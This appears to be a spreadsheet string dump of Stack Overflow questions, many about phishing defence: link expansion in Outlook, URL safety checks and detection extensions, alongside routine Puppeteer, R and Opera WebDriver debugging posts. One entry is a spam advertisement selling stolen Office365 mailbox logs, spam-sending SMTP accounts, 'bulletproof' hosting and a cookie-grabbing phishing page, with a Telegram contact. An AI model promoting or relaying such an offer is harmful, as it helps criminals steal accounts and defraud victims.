    <t>&lt;jquery&gt;&lt;html&gt;&lt;css&gt;&lt;jquery-mobile&gt;</t>
  </si>
  <si>
    <t>auto expand hyperlinks in emails in Outlook with actual URL (prevent phishing)</t>
  </si>
  <si>
    <t>&lt;p&gt;For emails to Office365 accounts as viewed in a modern Outlook, is there a way to auto expand hyperlinks with the actual underlying URL. This way, users can immediately see where the URL is actually taking them, as opposed to having to trust the displayed hyperlink text or having to remember to hover over the hyperlink.&lt;/p&gt;
 &lt;p&gt;For example, auto convert &lt;a href="https://www.malicious.com" rel="nofollow noreferrer"&gt;https://harmless.com&lt;/a&gt; into &lt;code&gt;https://harmless.com&lt;/code&gt; [&lt;a href="http://malicious.com" rel="nofollow noreferrer"&gt;http://malicious.com&lt;/a&gt;]&lt;/p&gt;
 &lt;p&gt;This appears like a very good middle ground between disabling all hyperlinks which a hassle for users, and having to rely on Microsoft's filtering capability in something like Safe Link.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;css&gt;&lt;outlook&gt;&lt;hyperlink&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Can't get puppeteer/chromium to cache assets</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a huge number of jest tests which use puppeteer and jest-environment-puppeteer to load a SPA, then drive certain interactions. The tests take a very long time to run, and after a lot of investigation it seems that a substantial portion of time is taken by the headless browser reloading the page and assets for every test. Since none of this will ever change within the context of a test run, it seems like a lot of wasted effort, so I'm trying to get chromium to cache the page and assets.&lt;/p&gt;
 &lt;p&gt;The approach the tests use is to create a single browser instance, then load a new page for each test, using request interception to give canned responses (including the static assets). Here is the puppeteer config:&lt;/p&gt;
 &lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;module.exports = {
  launch: {
  executablePath: '/usr/bin/chromium-browser',
  dumpio: true,
  args: [
  '--disable-software-rasterizer',
  '--disable-gpu',
  '--no-sandbox',
  '--remote-debugging-port=9222',
  '--remote-debugging-address=0.0.0.0',
  '--no-zygote',
  '--window-size=1280,1024',
  '--hide-scrollbars',
  '--no-default-browser-check',
  '--no-startup-window',
  '--disable-smooth-scrolling',
  '--enable-font-antialiasing',
  '--disable-background-networking',
  '--disable-background-timer-throttling',
  '--disable-backgrounding-occluded-windows',
  '--disable-boot-animation',
  '--disable-breakpad',
  '--disable-client-side-phishing-detection',
  '--disable-component-extensions-with-background-pages',
  '--disable-default-apps',
  '--disable-dev-shm-usage',
  '--disable-extensions',
  '--disable-features=site-per-process',
  '--disable-hang-monitor',
  '--disable-ipc-flooding-protection',
  '--disable-low-res-tiling',
  '--disable-popup-blocking',
  '--disable-prompt-on-repost',
  '--disable-renderer-backgrounding',
  '--disable-sync',
  '--disable-translate',
  '--metrics-recording-only',
  '--no-first-run',
  '--safebrowsing-disable-auto-update',
  '--password-store=basic',
  '--use-mock-keychain',
  ],
  },
  browserContext: 'default',
 };
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Within the intercepting request handler, I'm setting &lt;code&gt;Cache-Control: max-age=604800&lt;/code&gt; in the responses with code that looks like this:&lt;/p&gt;
 &lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;async handleRequest(request) {
  const url = request.url();
  const method = request.method();
  const asset = this.assetRegistry.find(a =&amp;gt; a.url === url &amp;amp;&amp;amp; a.method === method);
  if (asset) {
  const body = fs.readFileSync(asset.file);
  request.respond({
  status: asset.status || 200,
  contentType: resourceTypes[request.resourceType()] || null,
  headers: { 'Cache-Control': 'max-age=604800' },
  body,
  });
  return true;
  }
  ...
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I have confirmed that the header is set correctly by inspecting the response from &lt;code&gt;page.goto&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;The html that is rendered is pretty standard, and contains references to the assets using standard tags, e.g.&lt;/p&gt;
 &lt;pre class="lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;link rel=&amp;quot;preload&amp;quot; href=&amp;quot;&amp;lt;%= staticAssetUrl %&amp;gt;/fonts/Roboto-Regular.woff2&amp;quot; as=&amp;quot;font&amp;quot; type=&amp;quot;font/woff2&amp;quot; crossorigin&amp;gt;
 ...
 &amp;lt;script type=&amp;quot;text/javascript&amp;quot; src=&amp;quot;&amp;lt;%= buildAssetUrl %&amp;gt;/app.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Other things I have checked:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;I am using the latest versions of puppeteer and jest-environment-puppeteer&lt;/li&gt;
 &lt;li&gt;I am only creating a single browser instance in global setup&lt;/li&gt;
 &lt;li&gt;I have tried explicitly setting &lt;code&gt;page.setCacheEnabled(true)&lt;/code&gt; (this should be the default anyway)&lt;/li&gt;
 &lt;li&gt;The URL requested by the browser is identical for subsequent requests (i.e. no fingerprinting)&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;jestjs&gt;&lt;puppeteer&gt;&lt;chromium&gt;</t>
  </si>
  <si>
    <t>Hosting EDUCATIONAL Phishing Site</t>
  </si>
  <si>
    <t>&lt;p&gt;Is there any place where I can legally host a phishing site for educational purposes? I need to for my Information Security course project. I've hosted it on Firebase and Github but they've both been taken down. Any hosting sites that will allow this?&lt;/p&gt;
 &lt;p&gt;Tried hosting on Firebase and Github, got removed and flagged&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;hosting&gt;&lt;web-hosting&gt;&lt;firebase-hosting&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Smtpleaks.com | Sell Inbox smtp - Fresh Office Box Logs with high invoices - Good Smtp inbox Office365 - Bulletproof cpanels</t>
  </si>
  <si>
    <t>&lt;p&gt;Fresh Office Box Logs with high invoice and payment terms all active box with invoices | Good Smtp inbox Office365 | Office Sender Inbox 100% | Office 365 Mass Sender Inbox | Bulletproof cpanels Never go red link | Office 365 Autograb cookies page | B2B Database list 2023 | Cloud Accounts &amp;amp; Smtps Office365, Gsuite, AWS SES 50K , Sendgrid, SparkPost Smtp , Kagoya Smtp Japan , Powerful Senders Inbox all domain .&lt;/p&gt;
 &lt;p&gt;To get started or make any enquiries for order, price information, and negotiation. I will reply to your message ASAP.&lt;/p&gt;
 &lt;p&gt;Website : smtpleaks.com
 Telegram: @phishletscrew
 Blog : evilginx-phishlet.blogspot.com&lt;/p&gt;
 &lt;p&gt;Fresh Office Box Logs with high invoice&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;smtp&gt;</t>
  </si>
  <si>
    <t>How do you combat website spoofing/phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;What is your suggested solution for the threat of website UI spoofing?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Assaf</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;user-interface&gt;&lt;spoofing&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>how to check if a url/link is safe in ruby on rails</t>
  </si>
  <si>
    <t>&lt;p&gt;So I looked around and found nothing that helps or clarify this question, suppose you have a ruby on rails (5.2) API and you want to save some URLs as part of a model definition, how to determine that the URL you are saving is safe? and by safe I mean, avoid URLs/links that may contain phishing and deceptive sites.&lt;/p&gt;
 &lt;p&gt;Thx in advance üëç.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ruby-on-rails&gt;&lt;security&gt;</t>
  </si>
  <si>
    <t>Using expression(paste( to insert math notation into a legend</t>
  </si>
  <si>
    <t>&lt;p&gt;I wish to substitute the following (yes, I've written it here in TeX format, just to be clear)&lt;br&gt;
 &lt;code&gt;$P_{M1}(\tilde{z}&amp;gt;z) - P_{M0}(\tilde{z}&amp;gt;z)$&lt;/code&gt;&lt;br&gt;
 for the green line's legend entry (cptsdtbehavioralm), and&lt;br&gt;
 &lt;code&gt;$P_{M2}(\tilde{z}&amp;gt;z) - P_{M0}(\tilde{z}&amp;gt;z)$&lt;/code&gt;&lt;br&gt;
 for the blue line's legend entry (fullbehavioralmodel). &lt;/p&gt;
 &lt;p&gt;Here is the code with which I generated the plot (I am omitting the 10,000-observation dataset and the transforms to generate the functions Fm0, Fm1 and Fm2): &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;bmp("bias_plot_v4.bmp", width=540, pointsize=10)
 ggplot(data.frame(x=c(0,80)),aes(x) ) +
  stat_function(fun=function(x)((1-Fm1(x)) - (1- Fm0(x))), geom="line", 
 aes(colour="cptsdtbehavioralm"), n=1000) +
  stat_function(fun=function(x)((1-Fm2(x)) - (1- Fm0(x))), geom="line", 
 aes(colour="fullbehavioralmodel"), n=1000) +
  theme_bw() +
  ylab("Probability") +
  xlab(expression(paste("Security breaches per 3-week spear-phishing campaign ", 
 italic( (z) )))) + 
  theme(aspect.ratio=.618) + 
  theme(legend.position=c(0.845,0.8)) +
  theme(legend.key = element_blank()) +
  scale_color_manual(values = c("cptsdtbehavioralm"="green2", 
 "fullbehavioralmodel" = "blue"), name="Bias")
 dev.off()
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Whenever I try to replace the "cptsdtbehavioralm" and "fullbehavioralmodel" with a math expression -- e.g. to keep it simple, &lt;code&gt;expression(P[{M1}])&lt;/code&gt; -- I get the following type of errors:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Error: unexpected '=' in:
 " theme(legend.key = element_blank()) +
  scale_color_manual(values = c(expression(P[{M1}]))="
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I'm at my wit's end -- any insight or suggestions would be very, very welcome. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;r&gt;&lt;ggplot2&gt;&lt;legend&gt;</t>
  </si>
  <si>
    <t>Is a software token a valid second factor in multi-factor security?</t>
  </si>
  <si>
    <t>&lt;p&gt;We are changing our remote log-in security process at my workplace, and we are concerned that the new system does not use &lt;a href="http://en.wikipedia.org/wiki/Two-factor_authentication" rel="nofollow noreferrer"&gt;multi-factor authentication&lt;/a&gt; as the old one did. (We had been using RSA key-fobs, but they are being replaced due to cost.) The new system is an anti-phishing image system which has been misunderstood to be a two-factor authentication system. We are now exploring ways to continue providing multi-factor security without issuing hardware devices to the users.&lt;/p&gt;
 &lt;p&gt;Is it possible to write a software-based token system to be installed on the user's PCs that would constitute a true second factor in a multi-factor authentication system? Would this be considered "something the user has", or would it simply be another form of "something the user knows"?&lt;/p&gt;
 &lt;p&gt;Edit: &lt;em&gt;phreakre&lt;/em&gt; makes a good point about cookies. For the sake of this question, assume that cookies have been ruled out as they are not secure enough.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Jeromy Irvine</t>
  </si>
  <si>
    <t>&lt;language-agnostic&gt;&lt;authentication&gt;</t>
  </si>
  <si>
    <t>Warning Message "This message may not have been sent by: sender@gmail.com Learn more Report phishing " in php</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying for send mail using php.But got these warning message in mail. 'This message may not have been sent by: zamisoft@gmail.com Learn more Report phishing. &lt;/p&gt;
 &lt;p&gt;My header is&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;$header_mail="select content from mail_header where id='1'";
 $header_mail2=mysql_query($header_mail);
 $fet=mysql_fetch_array($header_mail2);
 $content= $fet['content'];
 $Headers = "From:$content\r\n" . 
 "Reply-To:$content\r\n" . 
 "Content-type: text/html; charset=UTF-8 \r\n"; 
 $Headers.= "MIME-version: 1.0\n";
  $Headers .= 'X-Mailer: PHP/' . phpversion()."\r\n";
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Content in $content variable is &lt;code&gt;zamisoft&amp;lt;zamisoft@gmail.com&amp;gt;&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;Any body help me for solve these issue?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;</t>
  </si>
  <si>
    <t>Project to make an extension to detect phishing URL</t>
  </si>
  <si>
    <t>&lt;p&gt;Objective: This project aims to make a chrome extension that can detect any phishing URL whenever a page loads.&lt;/p&gt;
 &lt;p&gt;Current Processes: I have made an API in which whenever we pass any URL, it will give a response as it is a phishing or not phishing URL. After making the API, I m following the method to make the manifest, HTML, and JavaScript files.
 API Payload:
 URL: &lt;a href="https://phishingurldetectorapi.herokuapp.com/predict1" rel="nofollow noreferrer"&gt;https://phishingurldetectorapi.herokuapp.com/predict1&lt;/a&gt; (Method = Post)&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Body:
 {
  &amp;quot;url&amp;quot; : &amp;quot;www.google.com&amp;quot;
 }
 Response:
 &amp;quot;It is not a phishing url&amp;quot;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I want to pass the URL of any page whenever it loads in the &amp;quot;url&amp;quot; field of my API and it can display the response.&lt;/p&gt;
 &lt;p&gt;Issues: I am currently stuck in the part on how to pass the URL using javascript in my API body.
 Can anyone help with this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;python&gt;&lt;jquery&gt;&lt;google-chrome-extension&gt;</t>
  </si>
  <si>
    <t>Dojo.js has unvalidated data</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm working with an e-learning course that a vendor created (who we no longer deal with) and when I upload the files through my company's security software (HP Fortify Scan) I'm getting multiple errors. I've corrected all the errors expect one. The error is in the dojo.js file and it has to do with a &lt;code&gt;url&lt;/code&gt; variable being unvalidated. I'm sure it's a simple fix, but can someone explain what makes this unvalidated? And how can I validate this &lt;code&gt;url&lt;/code&gt; variable?&lt;/p&gt;
 &lt;p&gt;Here is a screen shot of the error message with the code (I put the line number in a comment):&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/GesyY.png" alt="Fortify Scan Screen Shot"&gt;&lt;/p&gt;
 &lt;p&gt;Code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;function xhr(url, options, returnDeferred){
  var response = util.parseArgs(
  url,
  util.deepCreate(defaultOptions, options),
  has('native-formdata') &amp;amp;&amp;amp; options &amp;amp;&amp;amp; options.data &amp;amp;&amp;amp; options.data instanceof FormData
  );
  // THIS IS LINE 11540
  url = response.url; 
  options = response.options;
  var remover,
  last = function(){
  remover &amp;amp;&amp;amp; remover();
  };
  //Make the Deferred object for this xhr request.
  var dfd = util.deferred(
  response,
  cancel,
  isValid,
  isReady,
  handleResponse,
  last
  );
  var _xhr = response.xhr = xhr._create();
  if(!_xhr){
  // If XHR factory somehow returns nothings,
  // cancel the deferred.
  dfd.cancel(new RequestError('XHR was not created'));
  return returnDeferred ? dfd : dfd.promise;
  }
  response.getHeader = function(headerName){
  return this.xhr.getResponseHeader(headerName);
  };
  if(addListeners){
  remover = addListeners(_xhr, dfd, response);
  }
  var data = options.data,
  async = !options.sync,
  method = options.method;
  try{
  // IE6 won't let you call apply() on the native function.
  // THIS IS LINE 11580
  _xhr.open(method, url, async, options.user || undefined, options.password || undefined);
  if(options.withCredentials){
  _xhr.withCredentials = options.withCredentials;
  }
  var headers = options.headers,
  contentType;
  if(headers){
  for(var hdr in headers){
  if(hdr.toLowerCase() === 'content-type'){
  contentType = headers[hdr];
  }else if(headers[hdr]){
  //Only add header if it has a value. This allows for instance, skipping
  //insertion of X-Requested-With by specifying empty value.
  _xhr.setRequestHeader(hdr, headers[hdr]);
  }
  }
  }
  if(contentType &amp;amp;&amp;amp; contentType !== false){
  _xhr.setRequestHeader('Content-Type', contentType);
  }
  if(!headers || !('X-Requested-With' in headers)){
  _xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
  }
  if(util.notify){
  util.notify.emit('send', response, dfd.promise.cancel);
  }
  _xhr.send(data);
  }catch(e){
  dfd.reject(e);
  }
  watch(dfd);
  _xhr = null;
  return returnDeferred ? dfd : dfd.promise;
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Thanks in advance,&lt;/p&gt;
 &lt;p&gt;Mike&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;security&gt;&lt;dojo&gt;&lt;fortify&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>I need PhishTank API keys because registration for new users is temporarily disabled?</t>
  </si>
  <si>
    <t>&lt;p&gt;I want to build a real-time Phishing detection application so I need API Keys.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;reactjs&gt;&lt;api&gt;&lt;developer-tools&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>C#: Issue with Opera 58.x | operadriver 2.42 | Selenium 3.141 - Opera not reachable</t>
  </si>
  <si>
    <t>&lt;p&gt;I've been doing product development and testing for the past 10 years and took over our company's R&amp;amp;D selenium testing for one of our products a couple years ago. I'm in the process of updating our C# test framework that tests our product's webserver functionality across a series of browsers. One of the browsers recently added by PM was Opera. Currently, we are using the following versioning in our framework:&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Selenium WebDriver&lt;/strong&gt;: V3.141.0.0
 &lt;strong&gt;Selenium WebDriver.Support&lt;/strong&gt;: V3.141.0.0
 &lt;strong&gt;Operadriver_win64&lt;/strong&gt;: V2.42
 &lt;strong&gt;Opera Browser&lt;/strong&gt;: 58.0.3135.127&lt;/p&gt;
 &lt;p&gt;PM specified we had to ensure we support Opera 58.x for our customer as this will be documented to the customer in our next product release, so unfortunately I'm tied to testing against this specific version.&lt;/p&gt;
 &lt;p&gt;I've done some extensive reading online about automating Opera. I determined from GitHub that I needed the operachromiumdriver v2.42 for my specifc 58.x version of Opera.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;string localappdata = Environment.GetEnvironmentVariable(&amp;quot;LocalAppData&amp;quot;);
 operadriverDir = Directory.GetCurrentDirectory();
 operadriverExe = @&amp;quot;operadriver.exe&amp;quot;;
 OperaOptions operaOptions = new OperaOptions
 {
  LeaveBrowserRunning = false,
  BinaryLocation = localappdata + @&amp;quot;\Programs\Opera\58.0.3135.127\opera.exe&amp;quot;
 };
 operaOptions.AddArgument(&amp;quot;--user-data-dir=&amp;quot; + localappdata + @&amp;quot;\Google\Chrome\Opera\User Data&amp;quot;);
 var service_opera = OperaDriverService.CreateDefaultService(operadriverDir, operadriverExe);
 service_opera.EnableVerboseLogging = true;
 service_opera.Start();
 int port = service_opera.Port;
 operaOptions.AddArgument(&amp;quot;--remote-debugging-port=&amp;quot; + port.ToString());
 driver = new OperaDriver(service_opera, operaOptions);
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;When I ran the above code with nunit as administrator, the following 3 things happen in order:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Operadriver.exe console window launches&lt;/li&gt;
 &lt;li&gt;OperaSoftware.OperaWebBrowser.1610649940 console window launches An&lt;/li&gt;
 &lt;li&gt;Instance of Opera.exe launches&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;At this point, nunit indicates the following error for this test:
 SystemTest_S7_1200.Communications._45WebServer._456_WebServer_Opera._45001_BasicFunctionality:
 SetUp : OpenQA.Selenium.WebDriverException : unknown error: Opera failed to start: crashed
 (Opera not reachable)
 (The process started from chrome location C:\Users\System Test\AppData\Local\Programs\Opera\58.0.3135.127\opera.exe is no longer running, so OperaDriver is assuming that Opera has crashed.)
 (Driver info: OperaDriver=2.42.3135 (O58),platform=Windows NT 10.0.17763 x86_64)&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;I was a bit confused by this error because I can clearly see Opera started. So, I got looking at the logging for operadriver.exe:
 Starting OperaDriver 2.42.3135 (O58) on port 37604
 Only local connections are allowed.
 [1612215723.848][INFO]: [0d995150afccdcc03195334ce4f36367] COMMAND InitSession {
  &amp;quot;capabilities&amp;quot;: {
  &amp;quot;firstMatch&amp;quot;: [ {
  &amp;quot;acceptInsecureCerts&amp;quot;: true,
  &amp;quot;browserName&amp;quot;: &amp;quot;opera&amp;quot;
  } ]
  },
  &amp;quot;desiredCapabilities&amp;quot;: {
  &amp;quot;acceptInsecureCerts&amp;quot;: true,
  &amp;quot;browserName&amp;quot;: &amp;quot;opera&amp;quot;,
  &amp;quot;operaOptions&amp;quot;: {
  &amp;quot;args&amp;quot;: [ &amp;quot;--user-data-dir=C:\\Users\\System Test\\AppData\\Local\\Google\\Chrome\\Opera\\BlankUserData&amp;quot;, &amp;quot;--disable-extensions&amp;quot;, &amp;quot;--remote-debugging-port=37604&amp;quot; ],
  &amp;quot;binary&amp;quot;: &amp;quot;C:\\Users\\System Test\\AppData\\Local\\Programs\\Opera\\58.0.3135.127\\opera.exe&amp;quot;
  }
  }
 }
 [1612215723.850][INFO]: Populating Preferences file: {
  &amp;quot;alternate_error_pages&amp;quot;: {
  &amp;quot;enabled&amp;quot;: false
  },
  &amp;quot;autofill&amp;quot;: {
  &amp;quot;enabled&amp;quot;: false
  },
  &amp;quot;browser&amp;quot;: {
  &amp;quot;check_default_browser&amp;quot;: false
  },
  &amp;quot;distribution&amp;quot;: {
  &amp;quot;import_bookmarks&amp;quot;: false,
  &amp;quot;import_history&amp;quot;: false,
  &amp;quot;import_search_engine&amp;quot;: false,
  &amp;quot;make_chrome_default_for_user&amp;quot;: false,
  &amp;quot;skip_first_run_ui&amp;quot;: true
  },
  &amp;quot;dns_prefetching&amp;quot;: {
  &amp;quot;enabled&amp;quot;: false
  },
  &amp;quot;profile&amp;quot;: {
  &amp;quot;content_settings&amp;quot;: {
  &amp;quot;pattern_pairs&amp;quot;: {
  &amp;quot;https://*,*&amp;quot;: {
  &amp;quot;media-stream&amp;quot;: {
  &amp;quot;audio&amp;quot;: &amp;quot;Default&amp;quot;,
  &amp;quot;video&amp;quot;: &amp;quot;Default&amp;quot;
  }
  }
  }
  },
  &amp;quot;default_content_setting_values&amp;quot;: {
  &amp;quot;geolocation&amp;quot;: 1
  },
  &amp;quot;default_content_settings&amp;quot;: {
  &amp;quot;geolocation&amp;quot;: 1,
  &amp;quot;mouselock&amp;quot;: 1,
  &amp;quot;notifications&amp;quot;: 1,
  &amp;quot;popups&amp;quot;: 1,
  &amp;quot;ppapi-broker&amp;quot;: 1
  },
  &amp;quot;password_manager_enabled&amp;quot;: false
  },
  &amp;quot;safebrowsing&amp;quot;: {
  &amp;quot;enabled&amp;quot;: false
  },
  &amp;quot;search&amp;quot;: {
  &amp;quot;suggest_enabled&amp;quot;: false
  },
  &amp;quot;translate&amp;quot;: {
  &amp;quot;enabled&amp;quot;: false
  }
 }
 [1612215723.854][INFO]: Populating Local State file: {
  &amp;quot;ab_testing&amp;quot;: {
  &amp;quot;uid&amp;quot;: &amp;quot;MjRlNmUzZmEtNDJmNS00YTI3LWI4YTQtMTk1MTY2YmEwMTU3&amp;quot;
  },
  &amp;quot;background_mode&amp;quot;: {
  &amp;quot;enabled&amp;quot;: false
  },
  &amp;quot;browserjs&amp;quot;: {
  &amp;quot;version&amp;quot;: &amp;quot;1540378800&amp;quot;
  },
  &amp;quot;component_updater&amp;quot;: {
  &amp;quot;widevine&amp;quot;: {
  &amp;quot;up_to_date&amp;quot;: false
  }
  },
  &amp;quot;hardware_acceleration_mode_previous&amp;quot;: true,
  &amp;quot;location&amp;quot;: {
  &amp;quot;country&amp;quot;: &amp;quot;us&amp;quot;,
  &amp;quot;country_from_server&amp;quot;: &amp;quot;unknown&amp;quot;
  },
  &amp;quot;partner_content&amp;quot;: {
  &amp;quot;version&amp;quot;: {
  &amp;quot;default&amp;quot;: 61
  }
  },
  &amp;quot;password_manager&amp;quot;: {
  &amp;quot;os_password_blank&amp;quot;: false,
  &amp;quot;os_password_last_changed&amp;quot;: &amp;quot;13255103709737702&amp;quot;
  },
  &amp;quot;shutdown&amp;quot;: {
  &amp;quot;num_processes&amp;quot;: 2,
  &amp;quot;num_processes_slow&amp;quot;: 1,
  &amp;quot;performed&amp;quot;: true,
  &amp;quot;type&amp;quot;: 2
  },
  &amp;quot;ssl&amp;quot;: {
  &amp;quot;rev_checking&amp;quot;: {
  &amp;quot;enabled&amp;quot;: false
  }
  },
  &amp;quot;startup_metric&amp;quot;: {
  &amp;quot;last_startup_timestamp&amp;quot;: &amp;quot;13256688446647647&amp;quot;,
  &amp;quot;last_startup_version&amp;quot;: &amp;quot;71.0.3578.98&amp;quot;,
  &amp;quot;same_version_startup_count&amp;quot;: 19
  },
  &amp;quot;subresource_filter&amp;quot;: {
  &amp;quot;ruleset_version&amp;quot;: {
  &amp;quot;checksum&amp;quot;: 1918231743,
  &amp;quot;content&amp;quot;: &amp;quot;9.18.0&amp;quot;,
  &amp;quot;format&amp;quot;: 23
  }
  },
  &amp;quot;update&amp;quot;: {
  &amp;quot;last_verify_time&amp;quot;: &amp;quot;13256674004800030&amp;quot;
  },
  &amp;quot;updateclientdata&amp;quot;: {
  &amp;quot;apps&amp;quot;: {
  &amp;quot;aemomkdncapdnfajjbbcbdebjljbpmpj&amp;quot;: {
  &amp;quot;cohort&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;cohortname&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;dlrc&amp;quot;: 5145,
  &amp;quot;pf&amp;quot;: &amp;quot;cc1d9041-3721-4533-b352-426560ac1a21&amp;quot;
  },
  &amp;quot;gcmjkmgdlgnkkcocmoeiminaijmmjnii&amp;quot;: {
  &amp;quot;cohort&amp;quot;: &amp;quot;1:bm1:xa9@0.01&amp;quot;,
  &amp;quot;cohortname&amp;quot;: &amp;quot;M54ToM99&amp;quot;,
  &amp;quot;dlrc&amp;quot;: 5145,
  &amp;quot;pf&amp;quot;: &amp;quot;6fd7e0e8-4cbf-4fa5-9f1e-8f3d1990b5b7&amp;quot;
  },
  &amp;quot;hfnkpimlhhgieaddgfemjhofmfblmnib&amp;quot;: {
  &amp;quot;cohort&amp;quot;: &amp;quot;1:jcl:&amp;quot;,
  &amp;quot;cohortname&amp;quot;: &amp;quot;Auto&amp;quot;,
  &amp;quot;dlrc&amp;quot;: 5145,
  &amp;quot;pf&amp;quot;: &amp;quot;e3b2fb1e-0ebb-45a6-a5e9-6a77ef613f0e&amp;quot;
  },
  &amp;quot;oimompecagnajdejgnnjijobebaeigek&amp;quot;: {
  &amp;quot;cohort&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;cohortname&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;dlrc&amp;quot;: 5145,
  &amp;quot;pf&amp;quot;: &amp;quot;2b5860db-7759-4ddf-b9ad-3ecceb3ec7c8&amp;quot;
  }
  }
  }
 }
 [1612215723.864][INFO]: Launching Opera: &amp;quot;C:\Users\System Test\AppData\Local\Programs\Opera\58.0.3135.127\opera.exe&amp;quot; --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-extensions --disable-extensions-except=&amp;quot;C:\Users\SYSTEM~1\AppData\Local\Temp\scoped_dir912_5937\internal&amp;quot; --disable-hang-monitor --disable-popup-blocking --disable-presto-profile-migration --disable-prompt-on-repost --disable-sync --disable-update --disable-usage-statistics-question --disable-web-resources --enable-automation --enable-logging --force-fieldtrials=SiteIsolationExtensions/Control --ignore-certificate-errors --log-level=0 --metrics-recording-only --no-default-browser-check --no-first-run --password-store=basic --ran-launcher --remote-debugging-port=37604 --test-type=webdriver --use-mock-keychain --user-data-dir=&amp;quot;C:\Users\System Test\AppData\Local\Google\Chrome\Opera\BlankUserData&amp;quot;
 [1612215723.870][DEBUG]: DevTools HTTP Request: http://localhost:37604/json/version
 [1612215723.874][DEBUG]: DevTools HTTP Request failed
 [1612215723.953][DEBUG]: DevTools HTTP Request: http://localhost:37604/json/version
 [1612215723.954][DEBUG]: DevTools HTTP Request failed
 [1612215724.014][DEBUG]: DevTools HTTP Request: http://localhost:37604/json/version
 [1612215724.016][DEBUG]: DevTools HTTP Request failed
 [1612215724.076][DEBUG]: DevTools HTTP Request: http://localhost:37604/json/version
 [1612215724.079][DEBUG]: DevTools HTTP Request failed
 [1612215724.140][DEBUG]: DevTools HTTP Request: http://localhost:37604/json/version
 [1612215724.141][DEBUG]: DevTools HTTP Request failed
 [1612215724.217][DEBUG]: DevTools HTTP Request: http://localhost:37604/json/version
 [1612215724.220][DEBUG]: DevTools HTTP Request failed
 [1612215724.283][DEBUG]: DevTools HTTP Request: http://localhost:37604/json/version
 [1612215724.285][DEBUG]: DevTools HTTP Request failed
 [1612215724.360][DEBUG]: DevTools HTTP Request: http://localhost:37604/json/version
 [1612215724.364][DEBUG]: DevTools HTTP Request failed
 [1612215724.425][DEBUG]: DevTools HTTP Request: http://localhost:37604/json/version
 [1612215724.448][DEBUG]: DevTools HTTP Request failed
 [1612215724.518][DEBUG]: DevTools HTTP Request: http://localhost:37604/json/version
 [1612215724.854][DEBUG]: DevTools HTTP Request failed
 [1612215724.946][INFO]: [0d995150afccdcc03195334ce4f36367] RESPONSE InitSession ERROR unknown error: Opera failed to start: crashed
  (Opera not reachable)
  (The process started from chrome location C:\Users\System Test\AppData\Local\Programs\Opera\58.0.3135.127\opera.exe is no longer running, so OperaDriver is assuming that Opera has crashed.)
 [1612215724.983][DEBUG]: Log type 'driver' lost 0 entries on destruction
 [1612215724.997][DEBUG]: Log type 'browser' lost 0 entries on destruction
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;In the OperaSoftware.OperaWebBrowser console, the following is logged:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;[8116:8468:0201/164204.426:ERROR:tcp_socket_win.cc(355)] bind() returned an error: Only one usage of each socket address (protocol/network address/port) is normally permitted. (0x2740)
 [8116:8468:0201/164204.442:ERROR:tcp_socket_win.cc(355)] bind() returned an error: Only one usage of each socket address (protocol/network address/port) is normally permitted. (0x2740)
 [8116:8468:0201/164204.473:ERROR:devtools_http_handler.cc(295)] Cannot start http server for devtools.
 [8116:3184:0201/164205.297:ERROR:gpu_process_transport_factory.cc(967)] Lost UI shared context.
 &lt;/code&gt;&lt;/pre&gt;
